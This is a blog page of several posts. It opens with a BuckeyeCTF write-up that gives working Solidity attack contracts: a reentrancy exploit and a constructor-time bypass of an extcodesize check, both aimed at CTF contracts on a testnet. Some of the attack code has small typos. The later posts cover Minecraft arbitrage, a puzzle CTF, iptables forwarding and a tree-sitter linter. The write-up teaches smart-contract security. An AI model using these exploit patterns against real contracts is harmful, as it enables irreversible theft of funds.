siraben’s musings

BuckeyeCTF 2022 Writeup - Nile & Andes

2022-11-13T08:30:00+00:00

Despite having worked in smart contract security, I have never actually performed an attack before—until now. Let’s take a look at some not-so-smart contracts, shall we?

Background

For our purposes, the Ethereum blockchain is just a distributed system where transactions are recorded and verified cryptographically. Transactions can include Ether (currency) and arbitrary data. By convention, the data conforms to the ABI, which is just a schema. Here’s some things that you can do with transactions that are relevant to this problem.

create new contracts (from a user account)
call public methods of other contracts (manually or programmatically)

Ethereum has a stack-based virtual machine (EVM) that executes the code in a smart contract. Usually, the smart contract is written in Solidity then compiled. Solidity is an object oriented, statically-typed language.

Now you know enough to make it big in Web3™!

Nile

The problem

I wrote my first smart contract on Ethereum, deployed onto the Görli testnet, you have got to check it out! To celebrate it’s launch, I’m giving away free tokens, you just have to redeem your balance. Connect to the server to see the contract address.

Oh boy do I love free tokens!

We are also given a netcat command that upon connection gives the following message:

Hello! The contract is running at 0x7217bd381C35dd9E1B8Fcbd74eaBac4847d936af on the Goerli Testnet.
Here is your token id: 0xdd9ebbfb04777dd38c3c17902d5d6848
Are you ready to receive your flag? (y/n)

And finally, we are given the following smart contract. Right from the start we see that have two maps from addresses to numbers and one map from addresses to booleans. They track how much balance an account has, how much can be redeemed, and whether the account is valid or not. Note that “account” and “balance” here refer to purely data associated with this contract, not the account and balance on the actual blockchain itself.

There’s also 3 “events” these are just different types of messages that the contract can “emit” (log) on the blockchain.

contract Nile {
    mapping(address => uint256) balance;
    mapping(address => uint256) redeemable;
    mapping(address => bool) accounts;

    event GetFlag(bytes32);
    event Redeem(address, uint256);
    event Created(address, uint256);

There’s a createAccount function that updates the maps corresponding to the originator of the transaction (msg.sender), then emits an event showing that an account with a given address has been created.

    function createAccount() public {
        balance[msg.sender] = 0;
        redeemable[msg.sender] = 100;
        accounts[msg.sender] = true;

        emit Created(msg.sender, 100);
    }

Interesting. We can also delete a valid account (our own), clearing the balance and redeemable values to 0.

    function deleteAccount() public {
        require(accounts[msg.sender]);
        balance[msg.sender] = 0;
        redeemable[msg.sender] = 0;
        accounts[msg.sender] = false;
    }

Conveniently, we also have a getFlag function, but this only runs to completion if we have enough money.

    function getFlag(bytes32 token) public {
        require(accounts[msg.sender]);
        require(balance[msg.sender] > 1000);

        emit GetFlag(token);
    }

Ah, right. The contract owner is also giving away free tokens! The redeem function checks that the caller has a valid account and is not redeeming more tokens than is redeemable. Then it calls the fallback function.

    function redeem(uint amount) public {
        require(accounts[msg.sender]);
        require(redeemable[msg.sender] > amount);

        (bool status, ) = msg.sender.call("");

        if (!status) {
            revert();
        }

        redeemable[msg.sender] -= amount;
        balance[msg.sender] += amount;

        emit Redeem(msg.sender, amount);
    }
}

And this is where the bug is. Since the redeemable and balance maps get updated after the fallback function is called, we can make the fallback function do another call to redeem, and again, and again…

The attack

So, what we need to do, in standard terminology, is something called a reentrancy attack. While theoretically simple, it was my first time doing it and I had some unfortunate attempts initially (my frustration will forever be captured on the blockchain).

To set it up we have to write another contract that will serve as the attack, this is what I wrote:

pragma solidity ^0.7.6;
import "./Nile.sol";

contract Attack {
    Nile nile;
    uint256 internal n = 0;
    event Fallback(address caller, string message);

    constructor(address _nile) {
        nile = Nile(_nile);
    }

    function attack() public {f
        nile.createAccount();
        nile.redeem(99);
    }

    function getFlag(bytes32 token) public {
        nile.getFlag(token);
    }

    fallback() external payable {
        if (n < 11) {
            emit Fallback(msg.sender, "Fallback was called");
            n += 1;
            nile.deleteAccount();
            nile.createAccount();
            nile.redeem(99);
        } else {
            emit Fallback(msg.sender, "Fallback has ended");
        }
    }
}

A few things to note. There are some variables, nile and n. nile points to the deployment of the vulnerable contract, and n records how many times the reentrancy was performed. To perform the attack we call attack, which creates the account and redeems 99 tokens. Now, since redeem calls the fallback function of the caller, we get to run the code in the fallback() method.

In the fallback() method we update the counter, delete the account, create a new one and redeem another 99 tokens. This works because the state in the target contract actually hasn’t been updated yet, so we can just continue creating and redeeming tokens.

These series of transactions is proof that I was able to get the flag. That’s the magic of blockchain, you can prove a heist happened!

Andes

The problem

Sometimes the house wins. Sometimes you both win. Note: the token must be right-padded to 64 bytes if using Remix and passing as a function parameter.

Bah, this smart contract is kind of long. Let’s take it piece by piece.

There’s a map of designators and balances, and some special address called a selector, along with a private variable nextVal and an 8 by 8 array of bids.

contract Andes {
    // designators can designate an address to be the next random
    // number selector
    mapping (address => bool) designators;
    mapping (address => uint) balances;

    address selector;
    uint8 private nextVal;
    address[8][8] bids;

    event Registered(address, uint);
    event RoundFinished(address);
    event GetFlag(bytes32);

There’s some pretty normal-looking functions that show how designators can be changed. It seems like only designators can set the next selector and that the selector can set the value of nextVal.

    modifier onlyDesignators() {
        require(designators[msg.sender] == true, "Not owner");
        _;
    }

    function setNextSelector(address _selector) public onlyDesignators {
        require(_selector != msg.sender);
        selector = _selector;
    }

    function setNextNumber(uint8 value) public {
        require(selector == msg.sender);
        nextVal = value;
    }

This time, we have a constructor, which sets the sender of the transaction to be a designator and resets the bids.

    constructor(){
        designators[msg.sender] = true;
        _resetBids();
    }

    function _resetBids() private {
        for (uint i = 0; i < 8; i++) {
            for (uint j = 0; j < 8; j++) {
                bids[i][j] = address(0);
            }
        }
    }

    function getBalance() public view returns(uint) {
        return balances[msg.sender];
    }

The register function sets the balance of the sender to be 50 only if it is currently less than 10, and a specific bid can be purchased if the balance of the sender is more than 10.

    function register() public {
        require(balances[msg.sender] < 10);
        balances[msg.sender] = 50;
        emit Registered(msg.sender, 50);
    }

    function purchaseBid(uint8 bid) public {
        require(balances[msg.sender] > 10);
        require(msg.sender != selector);

        uint row = bid % 8;
        uint col = bid / 8;

        if (bids[row][col] == address(0)) {
            balances[msg.sender] -= 10;
            bids[row][col] = msg.sender;
        }
    }

So once we have these bids, what can we do with them? Looks like designators can start a new round, and the winner is determined by nextVal. The lucky winner will get 1000 points, which gives them the ability to get the flag.

    function playRound() public onlyDesignators {
        address winner = bids[nextVal % 8][nextVal / 8];

        balances[winner] += 1000;
        _resetBids();

        emit RoundFinished(winner);
    }

    function getFlag(bytes32 token) public {
        require(balances[msg.sender] >= 1000);

        emit GetFlag(token);
    }

Finally, there’s these two functions which let us designate a new owner, but only if the sender satisfies the predicate _canBeDesignator. The purpose of that predicate is to determine if an address is actually an account or a contract.

    function designateOwner() public {
        require(_canBeDesignator(msg.sender));
        require(balances[msg.sender] > 0);
        designators[msg.sender] = true;
    }

    function _canBeDesignator(address _addr) private view returns(bool) {
        uint size = 0;

        assembly {
            size := extcodesize(_addr)
        }

        return size == 0 && tx.origin != msg.sender;
    }
}

It is in _canBeDesignator that the vulnerability lies. In the EVM, extcodesize is an opcode that returns the size of the code on an address. However, using extcodesize in this way is not good. When a contract’s constructor is called, extcodesize actually returns 0.

The attack

This is what we have so far:

only designators can set the next selector, and it cannot be itself
only selectors can set the next number
only designators can play a round

So to launch the attack, we’re going to need something a little bit more sophisticated; two contracts, Bidder and Designator. Designator’s constructor will launch the whole attack and call Attack to set Designator as a valid designator. Bidder will also purchase the bid at index 0.

Now that Designator is a designator, it can set the next number to 0 and play a round. Then, naturally, Bidder will win the round, then we can get the flag!

The contracts are really quite simple, and I just performed some steps interactively. Once again, here’s proof that we got the flag.

pragma solidity ^0.7.6;
import "./andes.sol";

// Makes bid
contract Bidder {
    Andes andes;
    bytes32 token;

    event MyBalanceIs(address caller, string message, uint b);

    constructor(address _andes) {
        andes = Andes(_andes);
        andes.register();
        andes.purchaseBid(0);
        andes.designateOwner();
    }

    function designate(address other) public {
        andes.setNextSelector(other);
    }

    function setToken(bytes32 _token) public {
        token = _token;
    }

    function getFlag() public {
        andes.getFlag(token);
    }

    function getBalance() public {
        uint b = andes.getBalance();
        emit MyBalanceIs(msg.sender, "Balance got", b);
    }
}

// Sets next number
contract Designator {
    constructor(address _andes, address _attack, bytes32 token) {
        // andes is the contract they deploy
        Andes andes = Andes(_andes);
        // attack is the contract we deploy, and we buy bid 0 and they're also owner
        Bidder attack = Attack(_attack);
        attack.setToken(token);
        // register ourselves
        andes.register();
        // make ourselves owner
        andes.designateOwner();
        // tell the attack contract to make us designator, and make us selector
        attack.designate(address(this));
        andes.setNextNumber(0);
        // start the round
        andes.playRound();
    }
}

Closing thoughts

These two challenges really illustrate the notion that smart contracts are not inherently more or less secure than other technology. Security is not just a technical problem but also a social process. Without the right coding practices and review processes, bugs can slip through and lead to disaster. The stakes are higher in blockchain because there is no reverting stolen funds, as dramatically demonstrated by recent market turmoil. Thanks for reading!

Views expressed here are of my own and not of any employer, former, present or future.

Arbitrage in Minecraft markets

2022-11-08T20:24:00+00:00

Admist all this talk of market making and economics, one idle evening during the summer of 2022 I wondered, “could I do arbitrage on a Minecraft server?” The answer was not only yes, but it was incredible to witness the extent to which by doing essentially nothing but trades I was able to accumulate tens of thousands in virtual currency. I’m not going to say which server this was performed on, but it should be straightforward to do the same in other economy-based servers.

Note: after essentially exercising all the arbitrage that was possible, a week later prices converged and it was much harder to do.

All’s fair in love and markets

What’s the price of a block of cobblestone? What about the price of gold? There are some heuristics that can help determine pricing, for instance iron blocks consist of 9 iron bars, so any price discrepancy would quickly be ironed out by arbitrage. Diamonds feel like they should be pricey, but maybe it’s unclear what would consistute a “fair” price. Fortunately, economics has the answer to this: let the market decide!

Several Minecraft servers have a buy/sell plugin in which a shopkeeper can stock up a chest with a desired item and set it to buy or sell the item. Some shops even have buy and sell chests for the same item. Of course, no one would be naïve enough to allow arbitrage to be exercised against themselves, so the spreads I observed were always ridiculous, and rightly so. If I don’t really need much of an item, why would be buying it at a high price from people and risk bankruptcy?

But there is no limit to how many stores can be opened and how things are priced. This is where arbitrage comes in. To make matters easier, there are no transaction fees, and the transactions happen instantly. There was also a warp system that conveniently allowed me to teleport to any market that people advertised on a list.

Let’s trade

The game, then, was straightforward. Go around collecting buy/sell information from various shops, just as in real markets, observe where a buy price is higher than a sell price, then do the trade.

Here’s a graph showing the net profits after 117 trades.

For completeness, this is how the transactions looked when I recorded them. The only unfortunate thing is that from time to time I bankrupted some users (RIP iced logs).

item	shop	quantity	price	amt	net profit
gunpowder	spawners and more	15	-10	-150	12551.2
gunpowder	killashop	15	15	225	12776.2
oak log	stellvia	114	-4	-456	12320.2
oak planks	iced logs	456	2	912	13232.2
birch log	stellvia	432	-4	-1728	11504.2
birch planks	iced logs	1728	2	3456	14960.2
spruce planks	celt	1472	-1	-1472	13488.2
spruce planks	iced logs (bankrupted)	162	2	324	13812.2

It was also interesting to observe market changes in real time. In one particular instance, gunpowder was being sold by the hundreds from a shop pricing them at $5 each, which was clearly a steal given that another shop is happily buying them at $15. After messaging the shopkeeper several times as I kept buying them out of gunpowder, I watched as the price rose to $7.5 then $10. That’s price convergence right there.

Future directions

Some thought experiments that I did not implement but might serve as suggestions for the interested reader:

Write a bot to automatically warp to every shop and scrape the sign data
Write a bot that exercises the arbitrage automatically (recommended: use state-of-the-art pathfinding bots such as baritone)

SekaiCTF 2022 Writeup - Matryoshka

2022-10-02T13:43:00+00:00

ANSI escape codes. Race conditions in PNG parsing. Digital COVID-19 vaccination records. De-noising audio files and the NATO phonetic alphabet. The only thing linking all of them? A race to solve a CTF challenge and get the flag.

This past weekend I had a lot of fun participating in SekaiCTF 2022. This post will dive into a particular problem our team found interesting and were quick to solve (we were the 5th solve out of 800+ teams that participated and 12 eventual solves for this question).

As the name implies, Matryoshka (матрёшка) refers to Russian nesting dolls. In the context of CTFs, this probably was hinting at the multi-layered nature of the problem, an appreciated nudge since we are pressed for time during competitions.

Setup

We were given two PNG files and the following bullet points.

`Matryoshka.png`	`Matryoshka-Lite.png`

One extra bit will double the 8 colors you already have, but ain’t these new colors too similar to the old ones?
“Never reinvent your own wheel”, people say. But Apple insisted on thinking differently when parsing PNGs.
?
?

This proved intriguing, since the screenshots appeared to show all that was necessary—the code, example run and what potentially could be the flag or next step. We see what appears to be VS Code windows with a dark, high-contrast theme on, Python code and colored text in a terminal, presumably generated from the same code.

The first bullet point refers to the fact that adding another bit to a string doubles the number of possible messages that could be conveyed. In this case, there are 8 color and 16 possibilities for terminal colors that would use 3 and 4 bits respectively.

The second bullet point I recognized as a possible reference to a phenomenon I saw on Hacker News 9 months ago, where the way that Apple software implemented PNG parsing had a race condition that could be exploited to cause PNG images to render differently than they would on other platforms. Though, no signs of that quite yet.

A very ANSI adventure

This resource was very helpful while brushing up on the ever-so-niche ANSI escape codes that have cryptic syntax.

Messages through ANSI color codes

Of course, I immediately transcribed the code, changed VS Code’s color settings and replicated the output. I chose to stick with the Matryoshka-Lite image because no foreground was being set and so I would only have to sample one color, and changed the smiley face to a dot.

import sys
stdin = sys.stdin.buffer.read()
d = "".join(bin(i)[2:].zfill(8) for i in stdin)
p = ""
for i in range(0, len(d), 8):
    l = d[i:i+4]
    h = d[i+4:i+8]
    he = 40 if h[0] == "0" else 100
    he += int(h[1:], 2)
    le = 40 if l[0] == "0" else 100
    le += int(l[1:], 2)
    p += f"\033[{he}m●\033[0m"
    p += f"\033[{le}m●\033[0m"
print(p)

The Japanese sentence あなたと私でランデブー？(You and me, rendezvous?) also provided a sanity check that the code was executing correctly. Being somewhat of a hobby linguist, I noticed immediately that the character ？ was the FULLWIDTH QUESTION MARK character which is used in East Asian languages. This was important in making sure that the outputs matched exactly.

Decrypting the block cipher

Cryptography wise, this was a relief. It’s immediately evident that this is a mere block cipher. To walk through an example, consider what happens when we start with the string fl. First we convert the scalar values (not bytes!) into binary numbers and leftpad them with zeroes.

>>> [bin(i)[2:].zfill(8) for i in "fl".encode()]
['01100110', '01101100']

Next we join the strings then take blocks l and h of size 4 each time. We check if the first digit is a 0 or 1 and adjust the value accordingly and add the remaining bits to either 40 or 100. Observe that since the maximum value of the remaining bits is 7, we can easily reverse the process to go back to the original block. Adjacent blocks are also transposed as we go along which was a bit unusual but did not affect the reversing process. This is the algorithm I wrote:

# inverse of encode
def decode(d):
    # reconstruct the first bit
    if d >= 100:
        d -= 100
        b = "1"
    else:
        d -= 40
        b = "0"
    # reconstruct the last 3 bits then concat
    return b + bin(d)[2:].zfill(3)

From color to data

Now that I had the algorithm to decrypt the cipher, I looked at the image and had to decide how to go from the colors shown into the array of numbers to decode. Since CTFs are time-sensitive, I literally just used macOS’s Color Picker utility and keyboard shortcuts to go through the colored rectangles one by one and paste them into Emacs. It would be disastrous to miss or repeat a color, so I found some Emacs Lisp code that would highlight the hex colors in text-mode buffers for ease of viewing.

So now we have a list of hex colors. Then, a bit of Emacs-fu and visual cross-checks allowed me to obtain the list of numbers.

enc = []
with open("data.txt") as f:
    for line in f:
        enc += [int(line)]
w = []
for i in range(0, len(enc), 2):
    w += [chr(int(decode(enc[i+1]) + decode(enc[i]),2))]
print("".join(w))

Decoding becomes a piece of cake. We obtain the URL https://matryoshka.sekai.team/-qLf-Aoaur8ZVqK4aFngYg.png, which is the following image:

Think Different(ly about PNG parsing)

I encourage you to scan the QR code. Things were looking a bit duller at this point. What’s with the noisy lines across the image? We spent a few minutes trying to collect the lines together and discern patterns in it, but no dice.

Then I remembered the clue from earlier. Unfortunately (or fortunately), my macOS version is far too new to have the bug, and several teammates were using Windows laptops. However, Nisala hadn’t updated his Mac in a while, and we were pleasantly surprised when we saw Safari correctly incorrectly rendering the PNG:

Bingo. Now when we scan the QR code, instead of a funny YouTube video we have this string:

shc:/56762959532654603460292540772804336028702865676754222809286237253760287028647167452228092863457452621103402467043423376555407105412745693904292640625506400459645404280536627540536459624025250555056338566029120106413333400028742635076939734552056936583171064558751131556353203754372575033328200705643838552934743139500009536061356931346955643709527105115665600005602172234467374542085807222475347132034424395261373056004444002400085237353061222027453167672627082630290769235375711135114127401104212540537525556303742533507136503255653563264154433970205436100050743522116306752331635775741156433654585503107626684254686208403754634470273768056171327607656125712725523234611005361121030308333867583166536725643767425270646323270003005623700860226659203405252357762043663326362209257233442225631073757558424358121058221221247175065067275426364058293454221133236771205077255211441131752363046604226175031256730654443172527522070726232026532434301128375372255668000400627667676055323160225036622041105858255222692922334259596624276377446745261173582545412027102861666538363053246255715622773453607507284404720407630733005623703641432800427011066429357722525365740010257264576557765569557135536228273331723728623059574332602964335058526177070375095735563159552930336664240727603959105433044575393334503567543958542929065332126645230910313334672722391208422438276434441236775655650958267743437110394352455760210354655321596331533463522358444058636442336866670845305568693721662269635473434227715411302507646165766341072469394221072671236868392755064436586159754123754210552170093809524555337700313654703040673106437576344009087611676326535274567421423023706811744311775220407005454032310440346554616620552130066153666738533667226435276755422240350073103639763904405705005555244371301010730641435756764057646755286006396271642377067569577743576669054164110561644535096843257762673432272976686542737404354077010832356003656226634535455971326660756506220359605868077353056052347436404527397258656831553804624139525240420467593362371139026720436433630272626572681040385977300452644174

Fully vaccinated

Scanning it with my iPhone I saw that it was a COVID-19 vaccination record, but nothing really seemed out of the ordinary. Then Akash found a Smart Health Card parser where we pasted in the raw contents.

We spotted an unusual entry in the contact information for the patient—a base64 encoded string.

...
contact: [
   {
      name: {
         text: "flag"
      },
      telecom: [
         {
            system: "url",
            value: "data:text/html;base64,PGF1ZGlvIHNyYz0iaHR0cHM6Ly9tYXRyeW9zaGthLnNla2FpLnRlYW0vOGQ3ODk0MTRhN2M1OGI1ZjU4N2Y4YTA1MGI4ZDc4OGUud2F2IiBjb250cm9scz4="
         }
      ]
   }
]
...

Onto the next stage!

All about that base

Let’s decode the base64.

$ echo 'PGF1ZGlvIHNyYz0iaHR0cHM6Ly9tYXRyeW9zaGthLnNla2FpLnRlYW0vOGQ3ODk0MTRhN2M1OGI1ZjU4N2Y4YTA1MGI4ZDc4OGUud2F2IiBjb250cm9scz4=' | base64 -d

Hm, an audio file (warning: loud noise). This was the most experimental of all the stages. At first it seemed like just noise but on closer listening we could faintly hear a human voice speak in regular intervals. It doesn’t show up on a spectrogram however:

Finding the signal in the noise

By now half of our team was listening to parts of the audio file and messing around with various audio settings such as equalization and noise reduction. To be clear, none of us are audio engineers by training so this was a do-what-feels-right kind of deal. Eventually, we found a website that did noise reduction and put the audio file through it 5 times, then, to our continual surprise (which was routine at this point), this is what we saw and heard:

Now the words were very clear. The words corresponded to the NATO phonetic alphabet and it was far easier to now transcribe the message, which was the flag, SEKAI{KandoRyoko5Five2Two4Four}.

Conclusions and feedback

The question was really well-designed, and was a refreshing format to see in a CTF competition which is often dominated by more traditional reverse engineering. I do want to highlight some things I thought were great to see:

Relying on colors can be a risky design choice, but the uniformity of VS Code and using a default theme was helpful
The hints about Apple-specific PNG rendering were good but potentially hard to overcome if the team did not have access to Apple hardware that was unpatched

I hope you enjoyed reading this post as I much as I enjoyed the process of working with my teammates and finding the flag!

Hosting a Minecraft server without extra hardware

2022-08-01T00:00:00+00:00

The problem

I want to play Minecraft with my friends, and I already have a server exposed to the internet. However, my server is severely underpowered and is unable to run a Minecraft server instance. On the other hand, I have a spare beefy laptop that can easily handle the load, but port-forwarding is not possible. Both the server and the laptop are on my Tailscale network. Could I somehow leverage all of this to spin up a Minecraft server with a public IP? The answer was yes—and I was surprised at how easy it all was. As a plus, the server is very playable and the latency was better than trying out random “free hosting” services.

Halfway with Tailscale

I already use Tailscale on all my devices, so of course when I spin up a Minecraft server instance on one device I can immediately connect to it from my other ones. My friends do not have Tailscale (yet!), so unfortunately node sharing is out of the picture for now, but I can still take advantage of Tailscale in that my laptop will always have a static IP relative to the server, and the server will always have a static IP relative to the public internet. So altogether the connection will be deterministic and I don’t have to resort to any dynamic shenanigans.

Let’s test the hypothesis.

$ NIXPKGS_ALLOW_UNFREE=1 nix run --impure nixpkgs#minecraft-server
Starting net.minecraft.server.Main
[22:18:53] [ServerMain/INFO]: Building unoptimized datafixer
[22:18:54] [ServerMain/INFO]: Environment: authHost='https://authserver.mojang.com', accountsHost='https://api.mojang.com', sessionHost='https://sessionserver.mojang.com', servicesHost='https://api.minecraftservices.com', name='PROD'
[22:18:54] [ServerMain/INFO]: Loaded 7 recipes
[22:18:55] [ServerMain/INFO]: Loaded 1179 advancements
[22:18:55] [Server thread/INFO]: Starting minecraft server version 1.19.1
[22:18:55] [Server thread/INFO]: Loading properties
[22:18:55] [Server thread/INFO]: Default game type: SURVIVAL
[22:18:55] [Server thread/INFO]: Generating keypair
[22:18:55] [Server thread/INFO]: Starting Minecraft server on *:25565
[22:18:55] [Server thread/INFO]: Using default channel type
[22:18:55] [Server thread/INFO]: Preparing level "world"
[22:18:55] [Server thread/INFO]: Preparing start region for dimension minecraft:overworld
[22:18:56] [Worker-Main-1/INFO]: Preparing spawn area: 0%
[22:18:56] [Worker-Main-1/INFO]: Preparing spawn area: 0%
[22:18:56] [Worker-Main-7/INFO]: Preparing spawn area: 0%
[22:18:57] [Worker-Main-7/INFO]: Preparing spawn area: 0%
[22:18:57] [Worker-Main-1/INFO]: Preparing spawn area: 83%
[22:18:57] [Server thread/INFO]: Time elapsed: 2080 ms
[22:18:57] [Server thread/INFO]: Done (2.163s)! For help, type "help"

And let’s check if Minecraft can see it if I put in the Tailscale IP…

Great success! Now we just need to expose it to the public internet.

iptables to the rescue!

iptables essentially lets you configure the rules of the Linux kernel firewall. Conceptually it’s quite simple. The user defines tables and when a packet comes in, it goes through chains of rules in the tables and you can route the packet through essentially whatever treatment you like. Java edition Minecraft servers use TCP port 25565 between the client and server.

NixOS configuration

It was very straightforward to enable IP forwarding and add 25565 to the list of open TCP ports for my server:

# combine with the rest of your configuration
{
   boot.kernel.sysctl."net.ipv4.ip_forward" = 1;
   networking.firewall.allowedTCPPorts = [ 25565 ];
}

Creating the rule

Now we can go ahead add the following commands to our firewall setup. Let dest_ip be the Tailscale IP of the server. The first command adds a rule to the PREROUTING chain which is where packets arrive before being processed. We basically immediately forward the packet over to the laptop pointed to by the IP address given by Tailscale. The second command essentially lets the source IP of the packet remain the same so the server just acts as a router.

# combine with the rest of your configuration
{
  networking.firewall.extraCommands = ''
    IPTABLES=${pkgs.iptables}/bin/iptables
    "$IPTABLES" -t nat -A PREROUTING -p tcp --dport 25565 -j DNAT --to-destination ${dest_ip}:25565
    "$IPTABLES" -t nat -A POSTROUTING -j MASQUERADE
  '';
}

Now we have the following setup:

Now we rebuild the server configuration, and checking again in Minecraft, this time using the public server IP, it all works as expected!

Final touches: a DNS record

For the final touches *chef’s kiss*, adding an A record gave me a nice URL I could give people instead of an IP address.

Performance

As far as performance goes, it’s pretty good! The proxy server is on the East coast and even though the Minecraft server is on the West coast, having played on it for several hours today, my friends and I had no problems whatsoever. I pinged people through the connection and latency was acceptable (77 ms for someone in New York).

References

Xe’s post on Tailscale, NixOS and Minecraft inspired me to write this, however my requirements were different. I did not want to require my friends to install Tailscale to play on my server, and wanted to leverage the existing hardware I had access to, essentially letting me use my server as a crappy router.

Various iptables tutorials and resources online helped me make sense of the terminology, commands and flags.

Fast mental conversion between ℃ and ℉

2022-06-23T04:48:00+00:00

As a speaker of multiple languages, I’m often aware of how inherent habits in our speech can greatly influence the extent to which other people make sense of it. But even when you speak the same language, even a topic as simple as the weather can already bring unnecessary friction to the conversation if the speakers are using incompatible units (cough cough). Or maybe I’m just coming up with an arbitrary reason to justify this party trick. In any case, I describe a mental heuristic that gets you within 0.25℃ for any temperature in Fahrenheit, and prove the error bound. For the other direction, the error in converting a temperature in Celsius to Fahrenheit is at most 0.5℉.

With this method, you get an immediate sense of the rough temperature in Celsius for a given temperature in Fahrenheit, and if you calculate a bit more, then the error is 0.25℃.

Anchor points

I memorize the following table. I recommend remembering that 50℉ corresponds to 10℃. Since Fahrenheit and Celsius have a linear relationship, a difference of 9℉ corresponds to a difference of 5℃. You can get the other numbers by adding as needed.

Fahrenheit	Celsius
32	0
41	5
50	10
59	15
68	20
77	25
86	30

Steps to perform the conversion

Given a temperature $T_F$ and the table,

Look up the nearest Farenheit value $v$ in the table. If it exists then you are done and the answer is $T[v]$.
Otherwise, compute $\frac{T_F-T[v]}{2}$, let the result be $d$
The approximation is given by $T[v]+d$

Here’s an example.

Suppose we are given 72℉. The nearest value in the table is 68℉, corresponding to 20℃.
Now we compute $\frac{72-68}{2}=2$
Now we add the two results to get 22℃.

Code

I can render the above steps into code so it’s unambiguous what I actually mean. Note that in the code I didn’t use a lookup table but instead some arithmetic to find the closest anchor point. Obviously in practice it’ll be memorized.

def convert_approx(given):
    # Nearest memorized temperature
    close = round((given - 5) / 9) * 9 + 5
    # Convert to Celsius
    rough = (close - 32) // 9
    # Half of the difference
    diff = (given - close) / 2
    return rough + diff

Proof of error bound

First observe since the memorized intervals occur every 9℉, the difference between the given temperature and nearest interval is at most 9/2 ℉. Then the conversion is approximated to 1/2 ℃/℉, so we calculate:

\[9/2(5/9-1/2) = 0.25℃\]

Final thoughts and when not to use it

That’s pretty much it. In summary the conversion is:

Accurate to within 0.25℃ for any temperature in Fahrenheit, or 0.5℉ for any temperature in Celsius.
Simply calculable; you never need to divide by more than 2.
Gives immediate feedback; at every step you get a temperature which is roughly the temperature in Celsius.

If you’re converting temperature in the thousands of degrees and higher, you’re better off approximating it by multiplying by 2 to go from ℃ to ℉. It’s unlikely you want super precise conversions in that temperature range, and the temperatures essentially have a direct linear relationship in that range anyway.

How to write a linter using tree-sitter in an hour

2022-03-22T16:35:00+00:00

This article was discussed on Hacker News.

This is a continuation of my last post on how to write a tree-sitter grammar in an afternoon. Building on the grammar we wrote, now we’re going to write a linter for Imp, and it’s even easier! The final result clocks in less than 60 SLOC and can be found here.

Recall that tree-sitter is an incremental parser generator. That is, you give it a description of the grammar of your programming language and it spits out a parser in C that creates a syntax tree based on the rules you specified. What’s notable about tree sitter is that it is resilient in the presence of syntax errors, and it being incremental means the parser is fast enough to reparse the file on every keystroke, only changing the parts of the tree as needed.

Specifically, we’ll write a program that suggests simplification of assignments and some conditional constructs. First I’ll describe the tree-sitter query language with some examples, then show how a little bit of JavaScript can let us manipulate the results programmatically. You can get the code in this post here. Ready? Set? Go!

Note: There are many language bindings that let you work with tree-sitter parsers using the respective language’s FFI. I’ve used only two to date, the Rust and the JavaScript bindings, and from my brief experience, the JavaScript bindings are much more usable. When using the Rust bindings the lifetime and mutability restrictions make abstraction more difficult, especially for a non-critical program such as a linter.

Tree-sitter queries

Tree-sitter has a built-in query language that lets you write queries to match parts of the AST of interest. Think of it as pattern matching, but you don’t need to handle every case of a syntactical construct.

Query syntax

Tree-sitter queries are written as a series of one or more patterns in an S-expression syntax. We first match on a node’s type (corresponding to a name of a node in the grammar file), then possibly the types of the children of the node as well. After each pattern, write @m (or any other valid variable name) so you can refer to the matched node later.

Our running example will be some Python code.

def factorial(n):
  return 1 if n == 0 else (n * (1 * 1)) * factorial(n - 1)

Let’s match all expressions involving binary operators.

(binary_operator) @m

def factorial(n):
  return 1 if n == 0 else (n * (1 * 1)) * factorial(n - 1)

Tree-sitter lets us specify what the children should be. So we can match all binary expressions involving at least one integer:

(binary_operator (integer)) @m

def factorial(n):
  return 1 if n == 0 else (n * (1 * 1)) * factorial(n - 1)

Or match all binary expressions involving two integers:

(binary_operator (integer) (integer)) @m

def factorial(n):
  return 1 if n == 0 else (n * (1 * 1)) * factorial(n - 1)

Try playing around with queries in the playground.

Capturing nodes

You can also assign capture names to nodes that you match, letting you refer to them later by name. This is useful because in the running example, suppose we wanted to capture the left and right integer arguments to a binary operator, labeling them a and b respectively. Then our query would look like this, and tree-sitter would highlight the matches accordingly.

(binary_operator (integer) @a (integer) @b) @m

def factorial(n):
  return 1 if n == 0 else (n * (1 * 1)) * factorial(n - 1)

Predicates

The tree-sitter query language also lets you specify additional constraints on matches. For instance, we can match on binary expressions where the left-hand side is n, which now gets highlighted in blue. The underscore _ lets us match any node.

((binary_operator _ @a _ @b) (#eq? @a n)) @m

def factorial(n):
  return 1 if n == 0 else (n * (1 * 1)) * factorial(n - 1)

Writing the linter

Now we have the basic parts out of the way, we can get to writing a linter! Instead of Python, we’ll continue working with Imp. Note that it’s easy to adapt this linter for any language with a tree-sitter grammar. Imp also has a much simpler semantics than Python so we can just focus on “obviously correct” lints rather than worry about suggestions changing program behavior.

We can start with a basic package.json:

{
  "name": "imp-lint",
  "type": "module",
  "version": "1.0.0",
  "description": "Linter for Imp",
  "main": "index.js",
  "scripts": {
    "lint": "node index.js"
  },
  "author": "Ben Siraphob",
  "license": "MIT",
  "devDependencies": {
    "tree-sitter": "^0.20.0",
    "tree-sitter-imp": "github:siraben/tree-sitter-imp"
  }
}

Then npm install to install the dependencies. We’ll write our code in index.js then we can call our linter by running npm run lint .

Imports and setup

Nothing fancy here, just the Parser class from the tree-sitter library and our language definition Imp (discussed in my last blog post), and a library to read from the filesystem.

import Parser from "tree-sitter";
import Imp from "tree-sitter-imp";
import { readFileSync } from "fs";

const { Query } = Parser;
const parser = new Parser();
parser.setLanguage(Imp);

const args = process.argv.slice(2);

if (args.length != 1) {
  console.error("Usage: npm run lint ");
  process.exit(1);
}

// Load the file passed as an argument
const sourceCode = readFileSync(args[0], "utf8");

Creating the parse tree

We then create the parser, set the language to Imp and run the parser on our source code to get out a syntax tree.

const parser = new Parser();
parser.setLanguage(Imp);

// Load the file passed as an argument
const tree = parser.parse(sourceCode);

If we have the following file:

x := x + 1

The corresponding output from console.log(tree.rootNode.toString()) would be:

(program (stmt (asgn name: (id) (plus (id) (num)))))

Identifying queries of interest

That was some preliminary work. Now let’s see what queries would be interesting to run over more realistic Imp programs. Say we have:

z := x;
y := 1;
y := y;
while ~(z = 0) do
  y := y * z;
  z := z - 1;
  x := x;
end;
x := x;
if x = y then x := 1 else x := 1 end

There’s some redundancies for sure! We can tell the user about assignments such as x := x which are a no-op, and that last if statement certainly looks redundant since both branches are the same statement.

It’s simple to create a Query object in JavaScript and run it over the root node.

const redundantQuery = new Query(
  Imp,
  "((asgn name: (id) @left _ @right) (#eq? @left @right)) @redundantAsgn"
);

